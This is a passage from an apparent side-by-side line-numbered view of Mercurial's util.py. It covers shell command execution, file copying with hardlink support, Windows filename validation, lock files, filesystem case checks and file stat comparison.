1471 except Exception:
1463 except Exception:
1472 pass
1464 pass
1473 cmd = quotecommand(cmd)
1465 cmd = quotecommand(cmd)
1474 env = shellenviron(environ)
1466 env = shellenviron(environ)
1475 if out is None or _isstdout(out):
1467 if out is None or _isstdout(out):
1476 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1468 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1477 env=env, cwd=cwd)
1469 env=env, cwd=cwd)
1478 else:
1470 else:
1479 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1471 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1480 env=env, cwd=cwd, stdout=subprocess.PIPE,
1472 env=env, cwd=cwd, stdout=subprocess.PIPE,
1481 stderr=subprocess.STDOUT)
1473 stderr=subprocess.STDOUT)
1482 for line in iter(proc.stdout.readline, ''):
1474 for line in iter(proc.stdout.readline, ''):
1483 out.write(line)
1475 out.write(line)
1484 proc.wait()
1476 proc.wait()
1485 rc = proc.returncode
1477 rc = proc.returncode
1486 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1478 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1487 rc = 0
1479 rc = 0
1488 return rc
1480 return rc
1489
1481
1490 def checksignature(func):
1482 def checksignature(func):
1491 '''wrap a function with code to check for calling errors'''
1483 '''wrap a function with code to check for calling errors'''
1492 def check(*args, **kwargs):
1484 def check(*args, **kwargs):
1493 try:
1485 try:
1494 return func(*args, **kwargs)
1486 return func(*args, **kwargs)
1495 except TypeError:
1487 except TypeError:
1496 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1488 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1497 raise error.SignatureError
1489 raise error.SignatureError
1498 raise
1490 raise
1499
1491
1500 return check
1492 return check
1501
1493
1502 # a whilelist of known filesystems where hardlink works reliably
1494 # a whilelist of known filesystems where hardlink works reliably
1503 _hardlinkfswhitelist = {
1495 _hardlinkfswhitelist = {
1504 'btrfs',
1496 'btrfs',
1505 'ext2',
1497 'ext2',
1506 'ext3',
1498 'ext3',
1507 'ext4',
1499 'ext4',
1508 'hfs',
1500 'hfs',
1509 'jfs',
1501 'jfs',
1510 'NTFS',
1502 'NTFS',
1511 'reiserfs',
1503 'reiserfs',
1512 'tmpfs',
1504 'tmpfs',
1513 'ufs',
1505 'ufs',
1514 'xfs',
1506 'xfs',
1515 'zfs',
1507 'zfs',
1516 }
1508 }
1517
1509
1518 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1510 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1519 '''copy a file, preserving mode and optionally other stat info like
1511 '''copy a file, preserving mode and optionally other stat info like
1520 atime/mtime
1512 atime/mtime
1521
1513
1522 checkambig argument is used with filestat, and is useful only if
1514 checkambig argument is used with filestat, and is useful only if
1523 destination file is guarded by any lock (e.g. repo.lock or
1515 destination file is guarded by any lock (e.g. repo.lock or
1524 repo.wlock).
1516 repo.wlock).
1525
1517
1526 copystat and checkambig should be exclusive.
1518 copystat and checkambig should be exclusive.
1527 '''
1519 '''
1528 assert not (copystat and checkambig)
1520 assert not (copystat and checkambig)
1529 oldstat = None
1521 oldstat = None
1530 if os.path.lexists(dest):
1522 if os.path.lexists(dest):
1531 if checkambig:
1523 if checkambig:
1532 oldstat = checkambig and filestat.frompath(dest)
1524 oldstat = checkambig and filestat.frompath(dest)
1533 unlink(dest)
1525 unlink(dest)
1534 if hardlink:
1526 if hardlink:
1535 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1527 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1536 # unless we are confident that dest is on a whitelisted filesystem.
1528 # unless we are confident that dest is on a whitelisted filesystem.
1537 try:
1529 try:
1538 fstype = getfstype(os.path.dirname(dest))
1530 fstype = getfstype(os.path.dirname(dest))
1539 except OSError:
1531 except OSError:
1540 fstype = None
1532 fstype = None
1541 if fstype not in _hardlinkfswhitelist:
1533 if fstype not in _hardlinkfswhitelist:
1542 hardlink = False
1534 hardlink = False
1543 if hardlink:
1535 if hardlink:
1544 try:
1536 try:
1545 oslink(src, dest)
1537 oslink(src, dest)
1546 return
1538 return
1547 except (IOError, OSError):
1539 except (IOError, OSError):
1548 pass # fall back to normal copy
1540 pass # fall back to normal copy
1549 if os.path.islink(src):
1541 if os.path.islink(src):
1550 os.symlink(os.readlink(src), dest)
1542 os.symlink(os.readlink(src), dest)
1551 # copytime is ignored for symlinks, but in general copytime isn't needed
1543 # copytime is ignored for symlinks, but in general copytime isn't needed
1552 # for them anyway
1544 # for them anyway
1553 else:
1545 else:
1554 try:
1546 try:
1555 shutil.copyfile(src, dest)
1547 shutil.copyfile(src, dest)
1556 if copystat:
1548 if copystat:
1557 # copystat also copies mode
1549 # copystat also copies mode
1558 shutil.copystat(src, dest)
1550 shutil.copystat(src, dest)
1559 else:
1551 else:
1560 shutil.copymode(src, dest)
1552 shutil.copymode(src, dest)
1561 if oldstat and oldstat.stat:
1553 if oldstat and oldstat.stat:
1562 newstat = filestat.frompath(dest)
1554 newstat = filestat.frompath(dest)
1563 if newstat.isambig(oldstat):
1555 if newstat.isambig(oldstat):
1564 # stat of copied file is ambiguous to original one
1556 # stat of copied file is ambiguous to original one
1565 advanced = (
1557 advanced = (
1566 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1558 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1567 os.utime(dest, (advanced, advanced))
1559 os.utime(dest, (advanced, advanced))
1568 except shutil.Error as inst:
1560 except shutil.Error as inst:
1569 raise Abort(str(inst))
1561 raise Abort(str(inst))
1570
1562
1571 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1563 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1572 """Copy a directory tree using hardlinks if possible."""
1564 """Copy a directory tree using hardlinks if possible."""
1573 num = 0
1565 num = 0
1574
1566
1575 gettopic = lambda: hardlink and _('linking') or _('copying')
1567 gettopic = lambda: hardlink and _('linking') or _('copying')
1576
1568
1577 if os.path.isdir(src):
1569 if os.path.isdir(src):
1578 if hardlink is None:
1570 if hardlink is None:
1579 hardlink = (os.stat(src).st_dev ==
1571 hardlink = (os.stat(src).st_dev ==
1580 os.stat(os.path.dirname(dst)).st_dev)
1572 os.stat(os.path.dirname(dst)).st_dev)
1581 topic = gettopic()
1573 topic = gettopic()
1582 os.mkdir(dst)
1574 os.mkdir(dst)
1583 for name, kind in listdir(src):
1575 for name, kind in listdir(src):
1584 srcname = os.path.join(src, name)
1576 srcname = os.path.join(src, name)
1585 dstname = os.path.join(dst, name)
1577 dstname = os.path.join(dst, name)
1586 def nprog(t, pos):
1578 def nprog(t, pos):
1587 if pos is not None:
1579 if pos is not None:
1588 return progress(t, pos + num)
1580 return progress(t, pos + num)
1589 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1581 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1590 num += n
1582 num += n
1591 else:
1583 else:
1592 if hardlink is None:
1584 if hardlink is None:
1593 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1585 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1594 os.stat(os.path.dirname(dst)).st_dev)
1586 os.stat(os.path.dirname(dst)).st_dev)
1595 topic = gettopic()
1587 topic = gettopic()
1596
1588
1597 if hardlink:
1589 if hardlink:
1598 try:
1590 try:
1599 oslink(src, dst)
1591 oslink(src, dst)
1600 except (IOError, OSError):
1592 except (IOError, OSError):
1601 hardlink = False
1593 hardlink = False
1602 shutil.copy(src, dst)
1594 shutil.copy(src, dst)
1603 else:
1595 else:
1604 shutil.copy(src, dst)
1596 shutil.copy(src, dst)
1605 num += 1
1597 num += 1
1606 progress(topic, num)
1598 progress(topic, num)
1607 progress(topic, None)
1599 progress(topic, None)
1608
1600
1609 return hardlink, num
1601 return hardlink, num
1610
1602
1611 _winreservednames = {
1603 _winreservednames = {
1612 'con', 'prn', 'aux', 'nul',
1604 'con', 'prn', 'aux', 'nul',
1613 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1605 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1614 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1606 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1615 }
1607 }
1616 _winreservedchars = ':*?"<>|'
1608 _winreservedchars = ':*?"<>|'
1617 def checkwinfilename(path):
1609 def checkwinfilename(path):
1618 r'''Check that the base-relative path is a valid filename on Windows.
1610 r'''Check that the base-relative path is a valid filename on Windows.
1619 Returns None if the path is ok, or a UI string describing the problem.
1611 Returns None if the path is ok, or a UI string describing the problem.
1620
1612
1621 >>> checkwinfilename(b"just/a/normal/path")
1613 >>> checkwinfilename(b"just/a/normal/path")
1622 >>> checkwinfilename(b"foo/bar/con.xml")
1614 >>> checkwinfilename(b"foo/bar/con.xml")
1623 "filename contains 'con', which is reserved on Windows"
1615 "filename contains 'con', which is reserved on Windows"
1624 >>> checkwinfilename(b"foo/con.xml/bar")
1616 >>> checkwinfilename(b"foo/con.xml/bar")
1625 "filename contains 'con', which is reserved on Windows"
1617 "filename contains 'con', which is reserved on Windows"
1626 >>> checkwinfilename(b"foo/bar/xml.con")
1618 >>> checkwinfilename(b"foo/bar/xml.con")
1627 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1619 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1628 "filename contains 'AUX', which is reserved on Windows"
1620 "filename contains 'AUX', which is reserved on Windows"
1629 >>> checkwinfilename(b"foo/bar/bla:.txt")
1621 >>> checkwinfilename(b"foo/bar/bla:.txt")
1630 "filename contains ':', which is reserved on Windows"
1622 "filename contains ':', which is reserved on Windows"
1631 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1623 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1632 "filename contains '\\x07', which is invalid on Windows"
1624 "filename contains '\\x07', which is invalid on Windows"
1633 >>> checkwinfilename(b"foo/bar/bla ")
1625 >>> checkwinfilename(b"foo/bar/bla ")
1634 "filename ends with ' ', which is not allowed on Windows"
1626 "filename ends with ' ', which is not allowed on Windows"
1635 >>> checkwinfilename(b"../bar")
1627 >>> checkwinfilename(b"../bar")
1636 >>> checkwinfilename(b"foo\\")
1628 >>> checkwinfilename(b"foo\\")
1637 "filename ends with '\\', which is invalid on Windows"
1629 "filename ends with '\\', which is invalid on Windows"
1638 >>> checkwinfilename(b"foo\\/bar")
1630 >>> checkwinfilename(b"foo\\/bar")
1639 "directory name ends with '\\', which is invalid on Windows"
1631 "directory name ends with '\\', which is invalid on Windows"
1640 '''
1632 '''
1641 if path.endswith('\\'):
1633 if path.endswith('\\'):
1642 return _("filename ends with '\\', which is invalid on Windows")
1634 return _("filename ends with '\\', which is invalid on Windows")
1643 if '\\/' in path:
1635 if '\\/' in path:
1644 return _("directory name ends with '\\', which is invalid on Windows")
1636 return _("directory name ends with '\\', which is invalid on Windows")
1645 for n in path.replace('\\', '/').split('/'):
1637 for n in path.replace('\\', '/').split('/'):
1646 if not n:
1638 if not n:
1647 continue
1639 continue
1648 for c in _filenamebytestr(n):
1640 for c in _filenamebytestr(n):
1649 if c in _winreservedchars:
1641 if c in _winreservedchars:
1650 return _("filename contains '%s', which is reserved "
1642 return _("filename contains '%s', which is reserved "
1651 "on Windows") % c
1643 "on Windows") % c
1652 if ord(c) <= 31:
1644 if ord(c) <= 31:
1653 return _("filename contains '%s', which is invalid "
1645 return _("filename contains '%s', which is invalid "
1654 "on Windows") % escapestr(c)
1646 "on Windows") % escapestr(c)
1655 base = n.split('.')[0]
1647 base = n.split('.')[0]
1656 if base and base.lower() in _winreservednames:
1648 if base and base.lower() in _winreservednames:
1657 return _("filename contains '%s', which is reserved "
1649 return _("filename contains '%s', which is reserved "
1658 "on Windows") % base
1650 "on Windows") % base
1659 t = n[-1:]
1651 t = n[-1:]
1660 if t in '. ' and n not in '..':
1652 if t in '. ' and n not in '..':
1661 return _("filename ends with '%s', which is not allowed "
1653 return _("filename ends with '%s', which is not allowed "
1662 "on Windows") % t
1654 "on Windows") % t
1663
1655
1664 if pycompat.iswindows:
1656 if pycompat.iswindows:
1665 checkosfilename = checkwinfilename
1657 checkosfilename = checkwinfilename
1666 timer = time.clock
1658 timer = time.clock
1667 else:
1659 else:
1668 checkosfilename = platform.checkosfilename
1660 checkosfilename = platform.checkosfilename
1669 timer = time.time
1661 timer = time.time
1670
1662
1671 if safehasattr(time, "perf_counter"):
1663 if safehasattr(time, "perf_counter"):
1672 timer = time.perf_counter
1664 timer = time.perf_counter
1673
1665
1674 def makelock(info, pathname):
1666 def makelock(info, pathname):
1675 """Create a lock file atomically if possible
1667 """Create a lock file atomically if possible
1676
1668
1677 This may leave a stale lock file if symlink isn't supported and signal
1669 This may leave a stale lock file if symlink isn't supported and signal
1678 interrupt is enabled.
1670 interrupt is enabled.
1679 """
1671 """
1680 try:
1672 try:
1681 return os.symlink(info, pathname)
1673 return os.symlink(info, pathname)
1682 except OSError as why:
1674 except OSError as why:
1683 if why.errno == errno.EEXIST:
1675 if why.errno == errno.EEXIST:
1684 raise
1676 raise
1685 except AttributeError: # no symlink in os
1677 except AttributeError: # no symlink in os
1686 pass
1678 pass
1687
1679
1688 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1680 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1689 ld = os.open(pathname, flags)
1681 ld = os.open(pathname, flags)
1690 os.write(ld, info)
1682 os.write(ld, info)
1691 os.close(ld)
1683 os.close(ld)
1692
1684
1693 def readlock(pathname):
1685 def readlock(pathname):
1694 try:
1686 try:
1695 return os.readlink(pathname)
1687 return os.readlink(pathname)
1696 except OSError as why:
1688 except OSError as why:
1697 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1689 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1698 raise
1690 raise
1699 except AttributeError: # no symlink in os
1691 except AttributeError: # no symlink in os
1700 pass
1692 pass
1701 fp = posixfile(pathname, 'rb')
1693 fp = posixfile(pathname, 'rb')
1702 r = fp.read()
1694 r = fp.read()
1703 fp.close()
1695 fp.close()
1704 return r
1696 return r
1705
1697
1706 def fstat(fp):
1698 def fstat(fp):
1707 '''stat file object that may not have fileno method.'''
1699 '''stat file object that may not have fileno method.'''
1708 try:
1700 try:
1709 return os.fstat(fp.fileno())
1701 return os.fstat(fp.fileno())
1710 except AttributeError:
1702 except AttributeError:
1711 return os.stat(fp.name)
1703 return os.stat(fp.name)
1712
1704
1713 # File system features
1705 # File system features
1714
1706
1715 def fscasesensitive(path):
1707 def fscasesensitive(path):
1716 """
1708 """
1717 Return true if the given path is on a case-sensitive filesystem
1709 Return true if the given path is on a case-sensitive filesystem
1718
1710
1719 Requires a path (like /foo/.hg) ending with a foldable final
1711 Requires a path (like /foo/.hg) ending with a foldable final
1720 directory component.
1712 directory component.
1721 """
1713 """
1722 s1 = os.lstat(path)
1714 s1 = os.lstat(path)
1723 d, b = os.path.split(path)
1715 d, b = os.path.split(path)
1724 b2 = b.upper()
1716 b2 = b.upper()
1725 if b == b2:
1717 if b == b2:
1726 b2 = b.lower()
1718 b2 = b.lower()
1727 if b == b2:
1719 if b == b2:
1728 return True # no evidence against case sensitivity
1720 return True # no evidence against case sensitivity
1729 p2 = os.path.join(d, b2)
1721 p2 = os.path.join(d, b2)
1730 try:
1722 try:
1731 s2 = os.lstat(p2)
1723 s2 = os.lstat(p2)
1732 if s2 == s1:
1724 if s2 == s1:
1733 return False
1725 return False
1734 return True
1726 return True
1735 except OSError:
1727 except OSError:
1736 return True
1728 return True
1737
1729
1738 try:
1730 try:
1739 import re2
1731 import re2
1740 _re2 = None
1732 _re2 = None
1741 except ImportError:
1733 except ImportError:
1742 _re2 = False
1734 _re2 = False
1743
1735
1744 class _re(object):
1736 class _re(object):
1745 def _checkre2(self):
1737 def _checkre2(self):
1746 global _re2
1738 global _re2
1747 try:
1739 try:
1748 # check if match works, see issue3964
1740 # check if match works, see issue3964
1749 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1741 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1750 except ImportError:
1742 except ImportError:
1751 _re2 = False
1743 _re2 = False
1752
1744
1753 def compile(self, pat, flags=0):
1745 def compile(self, pat, flags=0):
1754 '''Compile a regular expression, using re2 if possible
1746 '''Compile a regular expression, using re2 if possible
1755
1747
1756 For best performance, use only re2-compatible regexp features. The
1748 For best performance, use only re2-compatible regexp features. The
1757 only flags from the re module that are re2-compatible are
1749 only flags from the re module that are re2-compatible are
1758 IGNORECASE and MULTILINE.'''
1750 IGNORECASE and MULTILINE.'''
1759 if _re2 is None:
1751 if _re2 is None:
1760 self._checkre2()
1752 self._checkre2()
1761 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1753 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1762 if flags & remod.IGNORECASE:
1754 if flags & remod.IGNORECASE:
1763 pat = '(?i)' + pat
1755 pat = '(?i)' + pat
1764 if flags & remod.MULTILINE:
1756 if flags & remod.MULTILINE:
1765 pat = '(?m)' + pat
1757 pat = '(?m)' + pat
1766 try:
1758 try:
1767 return re2.compile(pat)
1759 return re2.compile(pat)
1768 except re2.error:
1760 except re2.error:
1769 pass
1761 pass
1770 return remod.compile(pat, flags)
1762 return remod.compile(pat, flags)
1771
1763
1772 @propertycache
1764 @propertycache
1773 def escape(self):
1765 def escape(self):
1774 '''Return the version of escape corresponding to self.compile.
1766 '''Return the version of escape corresponding to self.compile.
1775
1767
1776 This is imperfect because whether re2 or re is used for a particular
1768 This is imperfect because whether re2 or re is used for a particular
1777 function depends on the flags, etc, but it's the best we can do.
1769 function depends on the flags, etc, but it's the best we can do.
1778 '''
1770 '''
1779 global _re2
1771 global _re2
1780 if _re2 is None:
1772 if _re2 is None:
1781 self._checkre2()
1773 self._checkre2()
1782 if _re2:
1774 if _re2:
1783 return re2.escape
1775 return re2.escape
1784 else:
1776 else:
1785 return remod.escape
1777 return remod.escape
1786
1778
1787 re = _re()
1779 re = _re()
1788
1780
1789 _fspathcache = {}
1781 _fspathcache = {}
1790 def fspath(name, root):
1782 def fspath(name, root):
1791 '''Get name in the case stored in the filesystem
1783 '''Get name in the case stored in the filesystem
1792
1784
1793 The name should be relative to root, and be normcase-ed for efficiency.
1785 The name should be relative to root, and be normcase-ed for efficiency.
1794
1786
1795 Note that this function is unnecessary, and should not be
1787 Note that this function is unnecessary, and should not be
1796 called, for case-sensitive filesystems (simply because it's expensive).
1788 called, for case-sensitive filesystems (simply because it's expensive).
1797
1789
1798 The root should be normcase-ed, too.
1790 The root should be normcase-ed, too.
1799 '''
1791 '''
1800 def _makefspathcacheentry(dir):
1792 def _makefspathcacheentry(dir):
1801 return dict((normcase(n), n) for n in os.listdir(dir))
1793 return dict((normcase(n), n) for n in os.listdir(dir))
1802
1794
1803 seps = pycompat.ossep
1795 seps = pycompat.ossep
1804 if pycompat.osaltsep:
1796 if pycompat.osaltsep:
1805 seps = seps + pycompat.osaltsep
1797 seps = seps + pycompat.osaltsep
1806 # Protect backslashes. This gets silly very quickly.
1798 # Protect backslashes. This gets silly very quickly.
1807 seps.replace('\\','\\\\')
1799 seps.replace('\\','\\\\')
1808 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1800 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1809 dir = os.path.normpath(root)
1801 dir = os.path.normpath(root)
1810 result = []
1802 result = []
1811 for part, sep in pattern.findall(name):
1803 for part, sep in pattern.findall(name):
1812 if sep:
1804 if sep:
1813 result.append(sep)
1805 result.append(sep)
1814 continue
1806 continue
1815
1807
1816 if dir not in _fspathcache:
1808 if dir not in _fspathcache:
1817 _fspathcache[dir] = _makefspathcacheentry(dir)
1809 _fspathcache[dir] = _makefspathcacheentry(dir)
1818 contents = _fspathcache[dir]
1810 contents = _fspathcache[dir]
1819
1811
1820 found = contents.get(part)
1812 found = contents.get(part)
1821 if not found:
1813 if not found:
1822 # retry "once per directory" per "dirstate.walk" which
1814 # retry "once per directory" per "dirstate.walk" which
1823 # may take place for each patches of "hg qpush", for example
1815 # may take place for each patches of "hg qpush", for example
1824 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1816 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1825 found = contents.get(part)
1817 found = contents.get(part)
1826
1818
1827 result.append(found or part)
1819 result.append(found or part)
1828 dir = os.path.join(dir, part)
1820 dir = os.path.join(dir, part)
1829
1821
1830 return ''.join(result)
1822 return ''.join(result)
1831
1823
1832 def checknlink(testfile):
1824 def checknlink(testfile):
1833 '''check whether hardlink count reporting works properly'''
1825 '''check whether hardlink count reporting works properly'''
1834
1826
1835 # testfile may be open, so we need a separate file for checking to
1827 # testfile may be open, so we need a separate file for checking to
1836 # work around issue2543 (or testfile may get lost on Samba shares)
1828 # work around issue2543 (or testfile may get lost on Samba shares)
1837 f1, f2, fp = None, None, None
1829 f1, f2, fp = None, None, None
1838 try:
1830 try:
1839 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1831 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1840 suffix='1~', dir=os.path.dirname(testfile))
1832 suffix='1~', dir=os.path.dirname(testfile))
1841 os.close(fd)
1833 os.close(fd)
1842 f2 = '%s2~' % f1[:-2]
1834 f2 = '%s2~' % f1[:-2]
1843
1835
1844 oslink(f1, f2)
1836 oslink(f1, f2)
1845 # nlinks() may behave differently for files on Windows shares if
1837 # nlinks() may behave differently for files on Windows shares if
1846 # the file is open.
1838 # the file is open.
1847 fp = posixfile(f2)
1839 fp = posixfile(f2)
1848 return nlinks(f2) > 1
1840 return nlinks(f2) > 1
1849 except OSError:
1841 except OSError:
1850 return False
1842 return False
1851 finally:
1843 finally:
1852 if fp is not None:
1844 if fp is not None:
1853 fp.close()
1845 fp.close()
1854 for f in (f1, f2):
1846 for f in (f1, f2):
1855 try:
1847 try:
1856 if f is not None:
1848 if f is not None:
1857 os.unlink(f)
1849 os.unlink(f)
1858 except OSError:
1850 except OSError:
1859 pass
1851 pass
1860
1852
1861 def endswithsep(path):
1853 def endswithsep(path):
1862 '''Check path ends with os.sep or os.altsep.'''
1854 '''Check path ends with os.sep or os.altsep.'''
1863 return (path.endswith(pycompat.ossep)
1855 return (path.endswith(pycompat.ossep)
1864 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1856 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1865
1857
1866 def splitpath(path):
1858 def splitpath(path):
1867 '''Split path by os.sep.
1859 '''Split path by os.sep.
1868 Note that this function does not use os.altsep because this is
1860 Note that this function does not use os.altsep because this is
1869 an alternative of simple "xxx.split(os.sep)".
1861 an alternative of simple "xxx.split(os.sep)".
1870 It is recommended to use os.path.normpath() before using this
1862 It is recommended to use os.path.normpath() before using this
1871 function if need.'''
1863 function if need.'''
1872 return path.split(pycompat.ossep)
1864 return path.split(pycompat.ossep)
1873
1865
1874 def gui():
1866 def gui():
1875 '''Are we running in a GUI?'''
1867 '''Are we running in a GUI?'''
1876 if pycompat.isdarwin:
1868 if pycompat.isdarwin:
1877 if 'SSH_CONNECTION' in encoding.environ:
1869 if 'SSH_CONNECTION' in encoding.environ:
1878 # handle SSH access to a box where the user is logged in
1870 # handle SSH access to a box where the user is logged in
1879 return False
1871 return False
1880 elif getattr(osutil, 'isgui', None):
1872 elif getattr(osutil, 'isgui', None):
1881 # check if a CoreGraphics session is available
1873 # check if a CoreGraphics session is available
1882 return osutil.isgui()
1874 return osutil.isgui()
1883 else:
1875 else:
1884 # pure build; use a safe default
1876 # pure build; use a safe default
1885 return True
1877 return True
1886 else:
1878 else:
1887 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1879 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1888
1880
1889 def mktempcopy(name, emptyok=False, createmode=None):
1881 def mktempcopy(name, emptyok=False, createmode=None):
1890 """Create a temporary file with the same contents from name
1882 """Create a temporary file with the same contents from name
1891
1883
1892 The permission bits are copied from the original file.
1884 The permission bits are copied from the original file.
1893
1885
1894 If the temporary file is going to be truncated immediately, you
1886 If the temporary file is going to be truncated immediately, you
1895 can use emptyok=True as an optimization.
1887 can use emptyok=True as an optimization.
1896
1888
1897 Returns the name of the temporary file.
1889 Returns the name of the temporary file.
1898 """
1890 """
1899 d, fn = os.path.split(name)
1891 d, fn = os.path.split(name)
1900 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1892 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1901 os.close(fd)
1893 os.close(fd)
1902 # Temporary files are created with mode 0600, which is usually not
1894 # Temporary files are created with mode 0600, which is usually not
1903 # what we want. If the original file already exists, just copy
1895 # what we want. If the original file already exists, just copy
1904 # its mode. Otherwise, manually obey umask.
1896 # its mode. Otherwise, manually obey umask.
1905 copymode(name, temp, createmode)
1897 copymode(name, temp, createmode)
1906 if emptyok:
1898 if emptyok:
1907 return temp
1899 return temp
1908 try:
1900 try:
1909 try:
1901 try:
1910 ifp = posixfile(name, "rb")
1902 ifp = posixfile(name, "rb")
1911 except IOError as inst:
1903 except IOError as inst:
1912 if inst.errno == errno.ENOENT:
1904 if inst.errno == errno.ENOENT:
1913 return temp
1905 return temp
1914 if not getattr(inst, 'filename', None):
1906 if not getattr(inst, 'filename', None):
1915 inst.filename = name
1907 inst.filename = name
1916 raise
1908 raise
1917 ofp = posixfile(temp, "wb")
1909 ofp = posixfile(temp, "wb")
1918 for chunk in filechunkiter(ifp):
1910 for chunk in filechunkiter(ifp):
1919 ofp.write(chunk)
1911 ofp.write(chunk)
1920 ifp.close()
1912 ifp.close()
1921 ofp.close()
1913 ofp.close()
1922 except: # re-raises
1914 except: # re-raises
1923 try:
1915 try:
1924 os.unlink(temp)
1916 os.unlink(temp)
1925 except OSError:
1917 except OSError:
1926 pass
1918 pass
1927 raise
1919 raise
1928 return temp
1920 return temp
1929
1921
1930 class filestat(object):
1922 class filestat(object):
1931 """help to exactly detect change of a file
1923 """help to exactly detect change of a file
1932
1924
1933 'stat' attribute is result of 'os.stat()' if specified 'path'
1925 'stat' attribute is result of 'os.stat()' if specified 'path'
1934 exists. Otherwise, it is None. This can avoid preparative
1926 exists. Otherwise, it is None. This can avoid preparative
1935 'exists()' examination on client side of this class.
1927 'exists()' examination on client side of this class.
1936 """
1928 """
1937 def __init__(self, stat):
1929 def __init__(self, stat):
1938 self.stat = stat
1930 self.stat = stat
1939
1931
1940 @classmethod
1932 @classmethod
1941 def frompath(cls, path):
1933 def frompath(cls, path):
1942 try:
1934 try:
1943 stat = os.stat(path)
1935 stat = os.stat(path)
1944 except OSError as err:
1936 except OSError as err:
1945 if err.errno != errno.ENOENT:
1937 if err.errno != errno.ENOENT:
1946 raise
1938 raise
1947 stat = None
1939 stat = None
1948 return cls(stat)
1940 return cls(stat)
1949
1941
1950 @classmethod
1942 @classmethod
1951 def fromfp(cls, fp):
1943 def fromfp(cls, fp):
1952 stat = os.fstat(fp.fileno())
1944 stat = os.fstat(fp.fileno())
1953 return cls(stat)
1945 return cls(stat)
1954
1946
1955 __hash__ = object.__hash__
1947 __hash__ = object.__hash__
1956
1948
1957 def __eq__(self, old):
1949 def __eq__(self, old):
1958 try:
1950 try:
1959 # if ambiguity between stat of new and old file is
1951 # if ambiguity between stat of new and old file is
1960 # avoided, comparison of size, ctime and mtime is enough
1952 # avoided, comparison of size, ctime and mtime is enough
1961 # to exactly detect change of a file regardless of platform
1953 # to exactly detect change of a file regardless of platform
1962 return (self.stat.st_size == old.stat.st_size and
1954 return (self.stat.st_size == old.stat.st_size and
1963 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1955 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1964 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1956 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1965 except AttributeError:
1957 except AttributeError:
1966 pass
1958 pass
1967 try:
1959 try:
1968 return self.stat is None and old.stat is None
1960 return self.stat is None and old.stat is None
1969 except AttributeError:
1961 except AttributeError:
1970 return False
1962 return False
1971
1963
1972 def isambig(self, old):
1964 def isambig(self, old):
1973 """Examine whether new (= self) stat is ambiguous against old one
1965 """Examine whether new (= self) stat is ambiguous against old one
1974
1966
1975 "S[N]" below means stat of a file at N-th change:
1967 "S[N]" below means stat of a file at N-th change:
1976
1968
1977 - S[n-1].ctime < S[n].ctime: can detect change of a file
1969 - S[n-1].ctime < S[n].ctime: can detect change of a file
1978 - S[n-1].ctime == S[n].ctime
1970 - S[n-1].ctime == S[n].ctime
1979 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1971 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1980 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1972 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1981 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1973 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1982 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1974 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1983
1975
1984 Case (*2) above means that a file was changed twice or more at
